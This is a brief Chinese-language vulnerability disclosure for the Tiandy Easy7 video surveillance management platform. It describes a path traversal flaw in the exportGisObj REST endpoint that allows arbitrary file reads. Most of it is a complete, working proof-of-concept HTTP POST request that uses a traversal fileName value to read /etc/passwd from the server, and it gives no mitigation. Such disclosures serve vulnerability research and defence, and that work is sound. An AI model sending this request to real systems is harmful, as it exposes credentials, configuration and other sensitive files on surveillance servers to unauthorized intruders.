漏洞描述
天地伟业Easy7视频监控管理平台在实现exportGisObj接口时,未对用户提交的文件路径参数进行有效校验,导致攻击者可以通过构造特定的HTTP请求,读取服务器任意文件内容。例如,攻击者可通过目录遍历(如../../../../etc/passwd)方式,获取系统敏感文件,进而导致敏感信息泄露,严重时可为进一步攻击(如获取口令、配置文件等)提供条件。
POST /Easy7/rest/gis/exportGisObj HTTP/1.1
Host:
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 37
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
X-Requested-With: XMLHttpRequest
fileName=../../../../../../etc/passwd